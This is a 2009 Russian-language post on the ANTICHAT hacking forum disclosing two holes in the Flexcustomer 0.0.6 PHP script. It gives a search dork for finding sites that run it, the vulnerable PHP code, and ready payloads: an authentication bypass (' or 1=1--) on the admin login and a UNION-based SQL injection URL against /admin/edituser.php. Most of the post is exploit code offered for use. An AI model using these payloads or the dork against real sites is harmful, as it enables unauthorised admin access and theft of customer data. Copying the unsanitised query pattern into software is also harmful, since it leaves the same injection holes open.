HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу Уязвимости Flexcustomer
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Уязвимости Flexcustomer
  #1  
Старый 02.06.2009, 09:17
Iceangel_
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
С нами: 10441826

Репутация: 1861


По умолчанию Уязвимости Flexcustomer
Уязвимости Flexcustomer 0.0.6 (возможно уязвимы и более ранние версии)

download: http://www.china-on-site.com/flexcust/flexcusten.zip

dork: "Powered by Flexcustomer"

1) [bypass] (требования: magic_quotes=off)
не заметил, бага в паблике, но для следующей уязвимости она понадобится...
admin/usercheck.php
уязвимый код:
PHP код:
if (!empty($logincheck)){
$sql "select username,adminid from useradmin where username='$checkuser' and password='$checkpass'"
эксплуатирование:
Код:
login:' or 1=1--+

2) [SQL-injection] (требования: magic_quotes=off, доступ в админ панель)

/admin/edituser.php

уязвимый код:
PHP код:
<?php
$userinfo $db->getuserinfobyid($cid);
/CustomSql.inc
PHP код:
   function getuserinfobyid($customerid)
   {      
      $sql "select * from customer where customerid='$customerid'";
      $result $this->select($sql);
      return $result;
   } 
эксплуатирование:
/admin/edituser.php?cid=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--+
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось Iceangel_; 02.06.2009 в 09:34..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Переполнение буфера в Kaspersky Anti-Virus bul666 Мировые новости. Обсуждения. 9 15.08.2009 15:08
63% web-сайтов содержат опасные уязвимости Suicide Мировые новости. Обсуждения. 4 24.05.2009 21:51
В Windows Mobile найдено две уязвимости ground_zero Мировые новости. Обсуждения. 1 06.02.2007 11:40
Множественные уязвимости в INVISION POWER BOARD 2.1.x GreenBear Уязвимости 6 02.03.2006 21:36



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.